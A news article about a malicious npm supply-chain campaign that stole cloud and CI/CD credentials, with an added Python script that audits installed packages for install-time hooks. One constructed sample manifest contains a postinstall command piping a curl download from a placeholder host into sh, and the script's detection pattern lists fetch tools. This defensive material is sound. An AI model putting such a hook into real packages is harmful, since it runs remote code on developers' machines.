
Microsoft discovers new npm attack in 14 packages


Microsoft has discovered a new supply chain attack in which an attacker published fourteen malicious npm packages within a few hours. The packages masqueraded as tools for OpenSearch, Elasticsearch, and other widely used development environments, but were actually designed to steal sensitive credentials from cloud and CI/CD platforms.

According to Microsoft researchers, all packages appeared on May 28 under a newly created npm account. The attacker targeted developers working with services such as AWS, HashiCorp Vault, GitHub Actions, and npm itself. By posing as existing or related open-source projects, the attacker attempted to lure users into installing the software.

According to The Register, the attack fits into a broader trend in which cybercriminals use development environments as a point of entry. After all, access to CI/CD platforms and cloud accounts can lead to source code, corporate data, and production systems.

All fourteen packages contained the same malware. During installation, an initial program was automatically executed to gather information about the system. A second component was then loaded, specifically designed to steal login credentials, tokens, and other secrets from cloud and automation environments.

Microsoft warns that such attacks can extend beyond the originally infected systems. With stolen credentials, attackers can move laterally through an environment, collect additional data, and potentially even publish malicious updates via compromised developer accounts.

Deception via package names

To lure victims, the attacker used various techniques. Some packages employed typosquatting, where the name differed only slightly from a legitimate package. Others were given names strongly reminiscent of existing OpenSearch and Elasticsearch tools.

Additionally, metadata from real projects was copied. For example, links pointed to the websites, repositories, and bug trackers of existing open-source projects. The packages were also given strikingly high version numbers, making them appear at first glance to be software with a long development history.

The first variant of the attack utilized npm installation hooks. As soon as a developer installed the package, the malware collected information about the system, the user, and the Node.js environment, among other things. That data was sent to an external server, after which additional malware was downloaded.

A second generation of the attack operated more subtly. In this version, the malware first checked whether the Bun runtime was present. If not, a legitimate version of Bun was downloaded and used to execute the malicious code. This approach was intended to make the attack less conspicuous and reduce the likelihood of detection.
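As an added example that is not part of the article or of Microsoft's research, the following Python audit walks a project's node_modules and lists every installed package that declares an install-time lifecycle hook (the mechanism the first variant abused), flagging hooks that fetch code or a runtime during installation. The package names, versions and URLs in the sample manifests are constructed for illustration.

```python
"""Audit installed npm packages for install-time lifecycle hooks."""
import json
import os
import re
from typing import Optional

# Lifecycle scripts that `npm install` runs automatically for a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Hook contents that deserve a closer look: fetching code or a runtime at install time.
SUSPICIOUS = re.compile(r"\b(curl|wget|bun|node -e|eval|https?://)", re.IGNORECASE)


def audit_package_json(pkg: dict) -> Optional[dict]:
    """Return a finding for one manifest, or None if it has no install hooks."""
    hooks = {k: v for k, v in pkg.get("scripts", {}).items() if k in INSTALL_HOOKS}
    if not hooks:
        return None
    return {
        "name": pkg.get("name", "?"),
        "version": pkg.get("version", "?"),
        "hooks": hooks,
        "suspicious": any(SUSPICIOUS.search(cmd) for cmd in hooks.values()),
    }


def scan_node_modules(root: str) -> list:
    """Collect findings for every package.json below an installed node_modules tree."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                finding = audit_package_json(json.load(fh))
        except (OSError, ValueError):
            continue  # unreadable or non-JSON manifest: skip, keep scanning
        if finding:
            findings.append(finding)
    return findings


# Constructed sample manifests (not the packages from the campaign).
SAMPLE_MANIFESTS = [
    {"name": "example-opensearch-tool", "version": "9.4.2",
     "scripts": {"postinstall": "node setup.js && curl -s https://example.invalid/s | sh"}},
    {"name": "example-plain-lib", "version": "1.3.0", "scripts": {"test": "jest"}},
]


def demo() -> list:
    """Run the audit over the constructed manifests; only the hooked one is reported."""
    return [f for f in map(audit_package_json, SAMPLE_MANIFESTS) if f]
```

Run `scan_node_modules("node_modules")` in a checkout to get the same findings for real installs; a hit is a prompt to review the hook, not proof of compromise, since many legitimate packages build native code post-install.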

Packages Removed

Microsoft has since had the affected packages removed from the npm registry. The company advises organizations to check whether developers have installed or used any of the compromised packages in build processes since May 28.

If so, Microsoft recommends replacing all potentially compromised credentials. This includes AWS accounts, HashiCorp Vault tokens, npm publishing permissions, and GitHub Actions credentials.

The attack underscores once again how attractive open-source ecosystems have become to cybercriminals. By targeting developers and their software supply chains, attackers can gain access to much larger targets with relatively little effort.